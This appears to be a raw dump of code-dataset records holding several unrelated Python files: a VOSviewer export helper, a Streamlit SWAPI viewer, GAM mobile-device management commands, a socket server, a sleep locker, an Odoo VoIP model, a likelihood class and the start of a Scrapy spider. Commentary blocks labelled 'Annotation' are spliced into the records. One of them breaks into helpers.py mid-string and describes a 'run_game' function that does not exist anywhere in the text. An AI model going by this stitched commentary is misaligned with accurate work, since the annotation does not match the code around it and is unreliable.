'py' (year).\")\n\ndef get_input(user_input, all_files):\n\n # Check if USER_INPUT is a valid path\n if not os.path.exists(user_input):\n raise FileNotFoundError('Input path not found. Please check the USER_INPUT variable.')\n \n # Check if USER_INPUT is a folder or a file\n if os.path.isdir(user_input):\n \n # Build list of file paths\n files = [os.path.join(user_input, f) for f in os.listdir(user_input)]\n \n # Ask whether to include individual files - else include entire folder\n if not all_files:\n select_files = []\n for f in files:\n print('Add {} to analysis? (y/n)'.format(f))\n response = input()\n if response.lower() in ['y', 'yes']:\n select_files.append(f)\n print('{} added.'.format(f))\n else:\n print('{} not added.'.format(f))\n continue\n return select_files\n else:\n print('All files added to analysis.')\n return files\n else:\n # Return path to file as single element list\n return [user_input]\n\ndef create_df(files, base, val):\n print('Creating DataFrame...')\n # Setup database parameters from reftypes.py\n separator = db[base]['sep']\n code = db[base]['enc']\n title = db[base]['ti']\n abstract = db[base]['ab']\n quote = db[base]['quote']\n \n # Create empty DataFrame and append each file\n df = pd.DataFrame()\n \n # Special case for ProQuest XLS-format\n if base == 'proquest':\n for f in files:\n add_file = pd.read_excel(f, index_col=False, usecols=[title, abstract, val])\n df = df.append(add_file)\n else:\n for f in files:\n add_file = pd.read_csv(f, sep=separator, encoding=code, index_col=False, usecols=[title, abstract, val], quoting=quote)\n df = df.append(add_file)\n return df\n\ndef scores_df(df, val):\n print('Creating scores table...')\n val_list = df[val].fillna('N/A')\n val_list.reset_index(drop=True, inplace=True)\n \n # Create list of unique values\n values = sorted(list(val_list.unique()))\n values = set([str(i).lower() for i in values])\n \n # Create DataFrame with a binary table of scores\n scores = pd.DataFrame(columns=values, index=val_list.index).fillna(0)\n \n # Populate each row of the binary table\n for i, val in enumerate(val_list):\n scores[str(val).lower()][i] = 1\n \n return scores\n\ndef format_header(scores):\n print('Formatting header...')\n # Remove illegal characters from column names with regular expression:\n scores.columns = [re.sub('[\\[\\]<>_]', '', col) for col in scores.columns]\n \n scores = scores.sort_index(axis=1)\n \n # Convert to 
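Annotation: the bullet-cleanup loops in run_game above only test centerx <= 0 or centery <= 0, so any bullet leaving through the right or bottom edge is never removed and the groups grow without bound if a sprite fires in those directions. A hedged fix that culls on every edge (usage: cull_offscreen(hero_bullets, screen.get_rect())):

def cull_offscreen(bullets, screen_rect):
    # Drop any bullet whose rect no longer overlaps the screen,
    # whichever edge it left by.
    for bullet in bullets.copy():
        if not screen_rect.colliderect(bullet.rect):
            bullets.remove(bullet)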
VOSviewer scores header format:\n scores.columns = ['score<{}>'.format(col) for col in scores.columns]\n \n return scores\n\ndef scores_file(scores, val, output_path, debugging):\n print('Creating scores file...')\n # Setup output values\n val = val.replace(' ', '_')\n sep_val = '\\t'\n \n output_name = '{}_{}_scores.txt'.format(output_path, val)\n if os.path.exists(output_name):\n raise Exception('File already exists. Change OUTPUT_NAME and try again.')\n if not debugging:\n scores.to_csv(path_or_buf=output_name, sep=sep_val, index=False)\n\ndef corpus_file(df, base, output_path, debugging):\n print('Creating corpus file...')\n # Setup output values\n sep_val = '\\t'\n output_name = '{}_corpus.txt'.format(output_path)\n\n # Get N/A data for summary and clean output\n abstract_na = df[db[base]['ab']].isna().sum()\n df[db[base]['ab']] = df[db[base]['ab']].fillna('-')\n corpus = pd.DataFrame(df[db[base]['ti']] + ' ' + df[db[base]['ab']])\n if os.path.exists(output_name):\n raise Exception('File already exists. Change OUTPUT_NAME and try again.\\nNote: corpus files can be re-used with different scores files from the same data set.')\n if not debugging:\n corpus.to_csv(path_or_buf=output_name, sep=sep_val, index=False, header=False)\n\n # Return number of missing abstracts for summary()\n return int(abstract_na)\n\ndef check_output(output_path):\n if not os.path.exists(output_path):\n print('Output directory not found. Creating path...')\n os.makedirs(output_path)\n\ndef summary(scores_df, time_elapsed, abstract_na):\n if type(abstract_na) == int:\n abstract_pct = '{:.2%}'.format(abstract_na / len(scores_df))\n else:\n abstract_pct = 'N/A'\n print( \"\"\"\\n*** SUMMARY *** \\nNumber of scores values: {}\\nNumber of references: {}\\nAbstracts not available: {} ({})\\nTime elapsed: {}\"\"\"\\\n .format(len(scores_df.columns), len(scores_df), abstract_na, abstract_pct, time_elapsed))\n\n### W.I.P. 
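Annotation: scores_df above fills its 0/1 indicator table one row at a time; pd.get_dummies builds the same matrix in a single vectorised call, which is faster and less error-prone. A sketch on toy data (astype(int) because recent pandas returns booleans):

import pandas as pd

vals = pd.Series(['IEEE', 'acm', None, 'ieee']).fillna('N/A').str.lower()
scores = pd.get_dummies(vals).astype(int)    # one 0/1 column per unique value
scores = scores.sort_index(axis=1)           # mirrors format_header's sort
scores.columns = ['score<{}>'.format(c) for c in scores.columns]
print(scores)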
###\ndef bucketise(y_series, interval):\n # Define the range of the buckets\n y_min = y_series.min()\n y_max = y_series.max()\n\n # Generate left-inclusiive list of buckets adjusted for first and last year\n y_list = [y for y in range(y_min - interval, y_max + interval + 1) if y % interval == 0]\n buckets = pd.cut(y_series, y_list, right=False)\n\n # TODO: Adjust right edge\n\n # Format output\n buckets = buckets.astype(str).str.strip('[)')\n buckets = buckets.str.replace(', ', '-')\n\n return buckets\n\ndef generate_files(user_input, output_name, path, val, base, all_files=False, skip=False, buckets=False, interval=5, debugging=False):\n\n # Set timer for summary()\n start_time = datetime.datetime.now()\n # Check user variables\n check_db(base, val)\n check_output(path)\n\n # Setup\n value = db[base][val]\n output_path = os.path.join(path, output_name)\n abstract_na = 'N/A'\n \n # Check input and generate DataFrame\n df = create_df(get_input(user_input, all_files), base, value)\n\n # Reset timer if the user has manually selected which files to include\n if not all_files:\n start_time = datetime.datetime.now()\n\n if buckets:\n # Check input bucket suitability\n if val == 'py':\n # Call bucketise() and assign return value to DataFrame\n years = df[value]\n value = 'buckets'\n df[value] = bucketise(years, interval)\n else:\n raise Exception('Bucketising only works for publication year (\"py\") - Please check VAL and BUCKETS.')\n \n scores = format_header(scores_df(df, value))\n\n scores_file(scores, value, output_path, debugging)\n\n if not skip:\n abstract_na = corpus_file(df, base, output_path, debugging)\n\n print('File creation successful.')\n\n # Calculate time elapsed.\n end_time = datetime.datetime.now()\n time_elapsed = end_time - start_time\n\n # Generate summary of file creation\n summary(scores, time_elapsed, abstract_na)","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":7326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"30843328","text":"import logging\nimport requests\n\nimport streamlit as st\n\nlogging.basicConfig(format=\"%(asctime)s %(levelname)s: %(message)s\", level=logging.INFO)\nBASE_URL = \"https://swapi.dev/api/\"\n\n\ndef call(url):\n \"\"\"\n Faz uma chamada genérica pra API e trata possíveis erros.\n Em caso de sucesso, retorna um dicionário com a resposta.\n Em caso de falha, retorna um dicionário vazio.\n \"\"\"\n response = requests.get(url)\n # Tratamento de erros\n if response.status_code >= 400:\n logging.error(\"Erro ao chamar %s\", url)\n return {}\n\n return response.json()\n\n\ndef list_entity(entity):\n \"\"\"\n Lista uma determinada entidade\n\n >>> list(\"planets\")\n (...) 
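Annotation: bucketise above leans on pd.cut with right=False; a tiny worked run makes the left-inclusive interval labels concrete, and shows why the sample's TODO about the right edge exists (a year equal to the final edge would fall outside every bucket):

import pandas as pd

years = pd.Series([1998, 2003, 2004, 2011])
edges = list(range(1995, 2020, 5))            # [1995, 2000, 2005, 2010, 2015]
buckets = pd.cut(years, edges, right=False)   # left-inclusive: [1995, 2000)
labels = buckets.astype(str).str.strip('[)').str.replace(', ', '-')
print(labels.tolist())   # ['1995-2000', '2000-2005', '2000-2005', '2010-2015']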
# Lista com planetas\n \"\"\"\n return call(f\"{BASE_URL}{entity}/\").get(\"results\")\n\n\nplanets = list_entity(\"planets\")\n\nfor idx, planet in enumerate(planets):\n st.header(planet[\"name\"])\n\n if st.button(\"Ver população cadastrada\", key=idx):\n planet = call(planets[idx][\"url\"])\n st.text(\n f\"O planeta {planet['name']} tem {len(planet['residents'])} moradores cadastrados\"\n )\n\n st.markdown(\"---\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"591450769","text":"import sys\nimport uuid\n\nimport gam\nfrom gam.var import *\nfrom gam import controlflow\nfrom gam import display\nfrom gam import gapi\nfrom gam.gapi import directory as gapi_directory\nfrom gam import utils\n\n\ndef delete():\n cd = gapi_directory.build()\n resourceId = sys.argv[3]\n gapi.call(cd.mobiledevices(),\n 'delete',\n resourceId=resourceId,\n customerId=GC_Values[GC_CUSTOMER_ID])\n\n\n\ndef info():\n cd = gapi_directory.build()\n resourceId = sys.argv[3]\n device_info = gapi.call(cd.mobiledevices(),\n 'get',\n customerId=GC_Values[GC_CUSTOMER_ID],\n resourceId=resourceId)\n if 'deviceId' in device_info:\n device_info['deviceId'] = device_info['deviceId'].encode('unicode-escape').decode(\n UTF8)\n attrib = 'securityPatchLevel'\n if attrib in device_info and int(device_info[attrib]):\n device_info[attrib] = utils.formatTimestampYMDHMS(device_info[attrib])\n display.print_json(device_info)\n\n\n\ndef print_():\n cd = gapi_directory.build()\n todrive = False\n titles = []\n csvRows = []\n fields = None\n projection = orderBy = sortOrder = None\n queries = [None]\n delimiter = ' '\n listLimit = 1\n appsLimit = -1\n i = 3\n while i < len(sys.argv):\n myarg = sys.argv[i].lower().replace('_', '')\n if myarg == 'todrive':\n todrive = True\n i += 1\n elif myarg in ['query', 'queries']:\n queries = gam.getQueries(myarg, sys.argv[i + 1])\n i += 2\n elif myarg == 'delimiter':\n delimiter = sys.argv[i + 1]\n i += 2\n elif myarg == 'listlimit':\n listLimit = gam.getInteger(sys.argv[i + 1], myarg, minVal=-1)\n i += 2\n elif myarg == 'appslimit':\n appsLimit = gam.getInteger(sys.argv[i + 1], myarg, minVal=-1)\n i += 2\n elif myarg == 'fields':\n fields = f'nextPageToken,mobiledevices({sys.argv[i+1]})'\n i += 2\n elif myarg == 'orderby':\n orderBy = sys.argv[i + 1].lower()\n validOrderBy = [\n 'deviceid', 'email', 'lastsync', 'model', 'name', 'os',\n 'status', 'type'\n ]\n if orderBy not in validOrderBy:\n controlflow.expected_argument_exit('orderby',\n ', '.join(validOrderBy),\n orderBy)\n if orderBy == 'lastsync':\n orderBy = 'lastSync'\n elif orderBy == 'deviceid':\n orderBy = 'deviceId'\n i += 2\n elif myarg in SORTORDER_CHOICES_MAP:\n sortOrder = SORTORDER_CHOICES_MAP[myarg]\n i += 1\n elif myarg in PROJECTION_CHOICES_MAP:\n projection = PROJECTION_CHOICES_MAP[myarg]\n i += 1\n else:\n controlflow.invalid_argument_exit(sys.argv[i], 'gam print mobile')\n for query in queries:\n gam.printGettingAllItems('Mobile Devices', query)\n page_message = gapi.got_total_items_msg('Mobile Devices', '...\\n')\n all_mobile = gapi.get_all_pages(cd.mobiledevices(),\n 'list',\n 'mobiledevices',\n page_message=page_message,\n customerId=GC_Values[GC_CUSTOMER_ID],\n query=query,\n projection=projection,\n fields=fields,\n orderBy=orderBy,\n sortOrder=sortOrder)\n for mobile in all_mobile:\n row = {}\n for attrib in mobile:\n if attrib in ['kind', 'etag']:\n continue\n if attrib in ['name', 
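Annotation: the call helper above maps every status >= 400 to an empty dict but will still raise on timeouts, connection failures, or a non-JSON body. A hedged variant that funnels all of those through the same logging path (keeping the sample's Portuguese log message):

import logging
import requests

def call(url, timeout=10):
    try:
        response = requests.get(url, timeout=timeout)
        response.raise_for_status()      # turn 4xx/5xx into exceptions
        return response.json()
    except (requests.RequestException, ValueError) as exc:
        # RequestException covers timeouts and connection errors;
        # ValueError covers a body that is not valid JSON.
        logging.error("Erro ao chamar %s: %s", url, exc)
        return {}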
'email', 'otherAccountsInfo']:\n if attrib not in titles:\n titles.append(attrib)\n if listLimit > 0:\n row[attrib] = delimiter.join(\n mobile[attrib][0:listLimit])\n elif listLimit == 0:\n row[attrib] = delimiter.join(mobile[attrib])\n elif attrib == 'applications':\n if appsLimit >= 0:\n if attrib not in titles:\n titles.append(attrib)\n applications = []\n j = 0\n for app in mobile[attrib]:\n j += 1\n if appsLimit and (j > appsLimit):\n break\n appDetails = []\n for field in [\n 'displayName', 'packageName', 'versionName'\n ]:\n appDetails.append(app.get(field, ''))\n appDetails.append(\n str(app.get('versionCode', '')))\n permissions = app.get('permission', [])\n if permissions:\n appDetails.append('/'.join(permissions))\n else:\n appDetails.append('')\n applications.append('-'.join(appDetails))\n row[attrib] = delimiter.join(applications)\n else:\n if attrib not in titles:\n titles.append(attrib)\n if attrib == 'deviceId':\n row[attrib] = mobile[attrib].encode(\n 'unicode-escape').decode(UTF8)\n elif attrib == 'securityPatchLevel' and int(mobile[attrib]):\n row[attrib] = utils.formatTimestampYMDHMS(\n mobile[attrib])\n else:\n row[attrib] = mobile[attrib]\n csvRows.append(row)\n display.sort_csv_titles(\n ['resourceId', 'deviceId', 'serialNumber', 'name', 'email', 'status'],\n titles)\n display.write_csv_file(csvRows, titles, 'Mobile', todrive)\n\n\ndef update():\n cd = gapi_directory.build()\n resourceIds = sys.argv[3]\n match_users = None\n doit = False\n if resourceIds[:6] == 'query:':\n query = resourceIds[6:]\n fields = 'nextPageToken,mobiledevices(resourceId,email)'\n page_message = gapi.got_total_items_msg('Mobile Devices', '...\\n')\n devices = gapi.get_all_pages(cd.mobiledevices(),\n 'list',\n page_message=page_message,\n customerId=GC_Values[GC_CUSTOMER_ID],\n items='mobiledevices',\n query=query,\n fields=fields)\n else:\n devices = [{'resourceId': resourceIds, 'email': ['not set']}]\n doit = True\n i = 4\n body = {}\n while i < len(sys.argv):\n myarg = sys.argv[i].lower().replace('_', '')\n if myarg == 'action':\n body['action'] = sys.argv[i + 1].lower()\n validActions = [\n 'wipe', 'wipeaccount', 'accountwipe', 'wipe_account',\n 'account_wipe', 'approve', 'block',\n 'cancel_remote_wipe_then_activate',\n 'cancel_remote_wipe_then_block'\n ]\n if body['action'] not in validActions:\n controlflow.expected_argument_exit('action',\n ', '.join(validActions),\n body['action'])\n if body['action'] == 'wipe':\n body['action'] = 'admin_remote_wipe'\n elif body['action'].replace('_',\n '') in ['accountwipe', 'wipeaccount']:\n body['action'] = 'admin_account_wipe'\n i += 2\n elif myarg in ['ifusers', 'matchusers']:\n match_users = gam.getUsersToModify(entity_type=sys.argv[i + 1].lower(),\n entity=sys.argv[i + 2])\n i += 3\n elif myarg == 'doit':\n doit = True\n i += 1\n else:\n controlflow.invalid_argument_exit(sys.argv[i], 'gam update mobile')\n if body:\n if doit:\n print(f'Updating {len(devices)} devices')\n describe_as = 'Performing'\n else:\n print(\n f'Showing {len(devices)} changes that would be made, not actually making changes because doit argument not specified'\n )\n describe_as = 'Would perform'\n for device in devices:\n device_user = device.get('email', [''])[0]\n if match_users and device_user not in match_users:\n print(\n f'Skipping device for user {device_user} that did not match match_users argument'\n )\n else:\n print(\n f'{describe_as} {body[\"action\"]} on user {device_user} device {device[\"resourceId\"]}'\n )\n if doit:\n gapi.call(cd.mobiledevices(),\n 
'action',\n resourceId=device['resourceId'],\n body=body,\n customerId=GC_Values[GC_CUSTOMER_ID])\n","sub_path":"src/gam/gapi/directory/mobiledevices.py","file_name":"mobiledevices.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"528209738","text":"import socket\nimport collector\nimport string\nfrom selenium import webdriver\n\n\nsock=socket.socket()\nsock.bind(('',9090))\nsock.listen(1)\nconn, addr = sock.accept()\n\nprint('connected:', addr)\n\na=1\nwhile a==1:\n data = conn.recv(1024)\n print(\"Data:\",data)\n if data:\n a=0\n conn.send(data)\n\ninfonew = data.decode('utf-8')\n\n\na = infonew.split() \nos=a[0]\nmemory=a[1]\nuname=a[2]\n\nsop=\"\"\"\n\n\n\n\nDATA\n\n\n\n\"\"\"\n\nscl=\"\"\"\n \n\n\"\"\"\n\ntab1=\"\"\ntab2=\"\"\ntab3=\"\"\n\nout = open(r'C:\\xampp\\htdocs\\E\\index.html', 'w')\nout.write(sop)\nout.write(tab1)\nout.write(tab2)\nout.write(tab3)\nout.write(scl)\nout.close()\n\ndriver=webdriver.Chrome()\ndriver.get(\"http://localhost/e/index.html\")\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"590509842","text":"import torch\n\n\nclass Network(torch.nn.Module):\n def __init__(self, max_num_enemies):\n super(Network, self).__init__()\n self.n_inputs = max_num_enemies * 2 + 1\n self.n_hidden_1 = 10 * self.n_inputs\n self.n_hidden_2 = 5 * self.n_inputs\n self.n_outputs = 2\n self.fc1 = torch.nn.Linear(self.n_inputs, self.n_hidden_1)\n self.ac1 = torch.nn.Sigmoid()\n self.fc2 = torch.nn.Linear(self.n_hidden_1, self.n_hidden_2)\n self.ac2 = torch.nn.Sigmoid()\n self.fc3 = torch.nn.Linear(self.n_hidden_2, self.n_outputs)\n self.ac3 = torch.nn.Sigmoid()\n self.layers = [self.fc1, self.fc2, self.fc3]\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.ac1(x)\n x = self.fc2(x)\n x = self.ac2(x)\n x = self.fc3(x)\n x = self.ac3(x)\n return x\n\n def get_structure(self):\n return self.n_inputs, self.n_hidden_1, self.n_hidden_2, \\\n self.n_outputs, len(self.layers)\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"16100888","text":"from .celery import app\nimport sys\n\n# Add the smrt_service package folder path to the sys.path list\nsys.path.append('/var/web_service/supersmart/smrt_service/')\nimport db_task\n\ndef get_task_status(task_id):\n\ttask = app.AsyncResult(task_id)\n\t\n\tif task.state == 'PENDING':\n\t\t# job has not started yet\n\t\tresponse = {\n\t\t\t'job_state': task.state,\n\t\t\t'current_step': 0,\n\t\t\t'total_steps': 12,\n\t\t\t'status_code': 200,\n\t\t\t'job_status': 'job has not started yet..',\n 'message': \"Success\"\n\t\t}\n\telif task.state == 'PROGRESS': #custom state name\n\t\tresponse = {\n\t\t\t'tree_id': task.info['tree_id'], \n\t\t\t'current_step': task.info['current_step'],\n\t\t\t'total_steps': task.info['total_steps'], \n\t\t\t'job_state' : task.state,\n\t\t\t'status_code' : 200, \n\t\t\t'job_status' : task.info['status'],\n 'message': \"Success\" \n\t\t}\n\telse:\n\t\tresponse = {\n\t\t\t'total_steps': 12,\n\t\t\t'status_code': 200,\n 'message': \"Success\"\n\t\t} \n\t\ttree_id, job_status, cur_step, ex_time = db_task.query_jid_db(task_id)\n\t\tif tree_id is not None:\n\t\t\tif cur_step == 12:\n\t\t\t\tresponse['job_state'] = 
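Annotation: network.py above keeps three Linear/Sigmoid pairs plus a hand-written forward(); the equivalent nn.Sequential stack cannot drift out of sync with its layer list. A self-contained smoke test of the same architecture (max_num_enemies=3, so the input width is 3 * 2 + 1 = 7):

import torch

def make_net(max_num_enemies):
    n_in = max_num_enemies * 2 + 1
    return torch.nn.Sequential(
        torch.nn.Linear(n_in, 10 * n_in), torch.nn.Sigmoid(),
        torch.nn.Linear(10 * n_in, 5 * n_in), torch.nn.Sigmoid(),
        torch.nn.Linear(5 * n_in, 2), torch.nn.Sigmoid(),
    )

net = make_net(3)
print(net(torch.randn(4, 7)).shape)   # torch.Size([4, 2]), outputs in (0, 1)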
\"SUCCESS\"\n\t\t\t\tresponse['job_status'] = \"completed\"\n\t\t\t\tresponse['execution_time'] = ex_time\n\t\t\t\tresponse['tree_id'] = tree_id\n\t\t\telse:\n\t\t\t\tresponse['job_status'] = \"Error in step %d: %s\"%(cur_step+1, job_status)\n\t\t\t\tresponse['job_state'] = \"FAILURE\"\n\t\telse:\n\t\t\tresponse['status_code'] = 500\n\t\t\tresponse['message'] = \"Could not retrieve any status\"\n\t''' \n\telse:\n\t\t# something went wrong in the background job\n\t\tresponse = {\n\t\t\t'job_state': task.state,\n\t\t\t'current_step': 0,\n\t\t\t'status_code': 200,\n\t\t\t'total_steps': 12,\n\t\t\t'job_status': str(task.info), # this is the exception raised\n 'message': \"Success\" \n\t }\n\t#except KeyError, e: \n\t#\treturn {'job_state':\"Error: %s\"%str(e)}\n\t'''\n\n\treturn response\n\n","sub_path":"supersmart/smrt_service/task_status.py","file_name":"task_status.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"327516683","text":"#!/usr/bin/env python2\n\nimport os\nimport subprocess\n\nimport dbus\nimport gobject\nfrom dbus.mainloop.glib import DBusGMainLoop\n\n\ndbus_loop = DBusGMainLoop()\n\nbus = dbus.SystemBus(mainloop=dbus_loop)\nlogin1 = bus.get_object(\"org.freedesktop.login1\",\n \"/org/freedesktop/login1\")\nmanager = dbus.Interface(login1, 'org.freedesktop.login1.Manager')\n\ninhibited = None\n\n\ndef take_lock():\n global inhibited\n inhibited = manager.Inhibit(\"sleep\", \"i3lock\", \"lock screen\", \"delay\")\n\n\ndef release_lock():\n os.close(inhibited.take())\n\n\ndef prepare_for_sleep(active):\n if active:\n subprocess.check_call([os.path.expanduser('~/work/i3-utils/lock.py')])\n release_lock()\n else:\n take_lock()\n\n\ntake_lock()\n\nmanager.connect_to_signal('PrepareForSleep', prepare_for_sleep)\n\nloop = gobject.MainLoop()\nloop.run()\n","sub_path":"sleep-locker.py","file_name":"sleep-locker.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484170579","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. 
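Annotation: get_task_status above reads task.state once per HTTP request; on the client side, the matching pattern is a poll loop that treats PENDING and the service's custom PROGRESS state as "keep waiting" and SUCCESS/FAILURE as final. A hedged sketch against the Celery result API (app is your Celery instance):

import time
from celery.result import AsyncResult

def wait_for(task_id, app, poll=2.0, timeout=600):
    deadline = time.time() + timeout
    while True:
        result = AsyncResult(task_id, app=app)
        if result.state in ('SUCCESS', 'FAILURE'):
            return result.state, result.info   # final states
        if time.time() > deadline:
            raise TimeoutError('task %s still %s' % (task_id, result.state))
        time.sleep(poll)                       # PENDING / PROGRESS: retry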
See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models\n\n\nclass MailActivityType(models.Model):\n _inherit = 'mail.activity.type'\n\n category = fields.Selection(selection_add=[('phonecall', 'Phonecall')])\n\n\nclass MailActivity(models.Model):\n _inherit = 'mail.activity'\n\n phone = fields.Char('Phone')\n mobile = fields.Char('Mobile')\n voip_phonecall_id = fields.Many2one('voip.phonecall', 'Linked Voip Phonecall')\n\n @api.model\n def create(self, values):\n activity = super(MailActivity, self).create(values)\n if activity.activity_type_id.category == 'phonecall':\n numbers = activity._compute_phonenumbers()\n if numbers['phone'] or numbers['mobile']:\n activity.phone = numbers['phone']\n activity.mobile = numbers['mobile']\n phonecall = self.env['voip.phonecall'].create_from_activity(activity)\n activity.voip_phonecall_id = phonecall.id\n notification = {'type': 'refresh_voip'}\n self.env['bus.bus'].sendone(\n (self._cr.dbname, 'res.partner', activity.user_id.partner_id.id),\n notification\n )\n return activity\n\n @api.multi\n def _compute_phonenumbers(self):\n self.ensure_one()\n model = self.env[self.res_model]\n record = model.browse(self.res_id)\n numbers = {\n 'phone': False,\n 'mobile': False,\n }\n if 'phone' in record:\n numbers['phone'] = record.phone\n if 'mobile' in record:\n numbers['mobile'] = record.mobile\n if not numbers['phone'] and not numbers['mobile']:\n fields = model._fields.items()\n partner_field_name = [k for k, v in fields if v.type == 'many2one' and v.comodel_name == 'res.partner']\n if partner_field_name:\n numbers['phone'] = record[partner_field_name[0]].phone\n numbers['mobile'] = record[partner_field_name[0]].mobile\n return numbers\n\n @api.multi\n def action_feedback(self, feedback=False):\n mail_message_id = False\n phone_activities = self.filtered(lambda a: a.voip_phonecall_id)\n if phone_activities:\n remaining = self - phone_activities\n for activity in phone_activities:\n user_id = activity.user_id.partner_id.id\n note = activity.note\n voip_phonecall_id = activity.voip_phonecall_id\n mail_message_id = super(MailActivity, activity).action_feedback(feedback)\n\n vals = {\n 'state': 'done',\n 'mail_message_id': mail_message_id,\n 'note': feedback if feedback else note,\n }\n if not voip_phonecall_id.call_date:\n vals.update(call_date=fields.Datetime.now())\n voip_phonecall_id.write(vals)\n self.env['bus.bus'].sendone(\n (self._cr.dbname, 'res.partner', user_id),\n {'type': 'refresh_voip'}\n )\n else:\n remaining = self\n if remaining:\n mail_message_id = super(MailActivity, remaining).action_feedback(feedback)\n\n return mail_message_id\n","sub_path":"voip/models/mail_activity.py","file_name":"mail_activity.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391615933","text":"import numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\n\nclass DataLikelihoods:\n def __init__(self, subject_num, **kwargs):\n \"\"\"\n Class to load in subject data and then compute likelihood of data given simulation\n\n Parameters\n ----------\n subject_num : Number of the subject as found in the CSV\n\n Outputs\n ----------\n self.likelihood : Likelihood of data. Computed incrementally. 
Requires calling\n self.increment_likelihood for each N and associated sim data dists and RTs.\n\n \"\"\"\n datapath = Path('../data/exp1.csv')\n exp1 = pd.read_csv(datapath, index_col=None)\n exp1.rename(columns={'sub': 'subno'}, inplace=True)\n\n self.sub_data = exp1.query('subno == {} & dyn == \\'Dynamic\\''.format(subject_num))\n self.likelihood = 0.\n\n def increment_likelihood(self, dist_matrix, rts_matrix, N, reward, lapse, **kwargs):\n \"\"\"\n Increments internal likelihood with the likelihood of given dists and rts\n\n Parameters\n ----------\n dist_matrix : 2 x 2 matrix of simulated data distributions (KDE) produced by obs class\n rts_matrix : 2 x 2 matrix of simulated reaction times (each entry a list of RTs) also\n produced by obs class\n N : N for given set of sim data\n reward : curr reward from optimizer\n lapse : lapse rate hyperparameter\n\n Outputs\n ----------\n Increment to self.likelihood\n\n \"\"\"\n N_data = self.sub_data.query('setsize == {}'.format(N))\n temp = np.mean(np.array(N_data['rt']))\n\n num_abs_0 = len(rts_matrix[0, 0])\n num_pres_1 = len(rts_matrix[1, 1])\n num_abs_1 = len(rts_matrix[0, 1])\n num_pres_0 = len(rts_matrix[1, 0])\n\n total_pres = num_pres_0 + num_pres_1\n total_abs = num_abs_0 + num_abs_1\n\n pres_rts_0 = N_data.query('resp == 2 & target == \\'Present\\'').rt.values\n pres_rts_1 = N_data.query('resp == 1 & target == \\'Present\\'').rt.values\n\n abs_rts_0 = N_data.query('resp == 2 & target == \\'Absent\\'').rt.values\n abs_rts_1 = N_data.query('resp == 1 & target == \\'Absent\\'').rt.values\n\n with np.errstate(divide='ignore'):\n # frac_pres_inc = len(pres_rts_0) / (len(pres_rts_0) + len(pres_rts_1))\n # frac_pres_corr = len(pres_rts_1) / (len(pres_rts_0) + len(pres_rts_1))\n log_like_pres = np.concatenate((np.log(num_pres_0 / total_pres) +\n np.log(dist_matrix[1, 0].pdf(pres_rts_0)),\n np.log(num_pres_1 / total_pres) +\n np.log(dist_matrix[1, 1].pdf(pres_rts_1))))\n\n # frac_abs_inc = len(abs_rts_1) / (len(abs_rts_0) + len(abs_rts_1))\n # frac_abs_corr = len(abs_rts_0) / (len(abs_rts_0) + len(abs_rts_1))\n log_like_abs = np.concatenate((np.log(num_abs_0 / total_abs) +\n np.log(dist_matrix[0, 0].pdf(abs_rts_0)),\n np.log(num_abs_1 / total_abs) +\n np.log(dist_matrix[0, 1].pdf(abs_rts_1))))\n\n log_like_all = np.concatenate((log_like_pres, log_like_abs))\n\n likelihood_pertrial = (1 - lapse) * np.exp(log_like_all) + \\\n (lapse / 2) * np.exp(-reward / temp)\n\n self.likelihood += -np.sum(np.log(likelihood_pertrial))\n","sub_path":"codes/data_and_likelihood.py","file_name":"data_and_likelihood.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"170064292","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a HxsdJobs spider created on top of the ATSSpider\n scrapy crawl hxsdjobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://job.hxsd.com/companylist/info-corpid-42136.html\"\n\n sample job url:\n http://job.hxsd.com/companylist/info-positionid-30385.html\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, ConvertDateString\n\n\nclass HxsdJobs(ATSSpider):\n\n name = \"hxsdjobs\"\n Ref_Num = compile(r\"positionid-(\\d+).htm\")\n Job_Count = compile(r\"(\\d+)\")\n item_map = {\n unicode('职位名称', 'utf-8'): 'title',\n 
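Annotation: the mixture at the bottom of increment_likelihood above is the heart of the model: each trial's probability is a weighted sum of the model likelihood and a lapse (guessing) process. Isolated, with log_like as the per-trial model log-likelihood array:

import numpy as np

def lapse_mixture_nll(log_like, lapse, reward, temp):
    # P(trial) = (1 - lapse) * P_model + (lapse / 2) * exp(-reward / temp);
    # the guess term is split evenly between the two possible responses.
    per_trial = (1.0 - lapse) * np.exp(log_like) \
                + (lapse / 2.0) * np.exp(-reward / temp)
    return -np.sum(np.log(per_trial))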
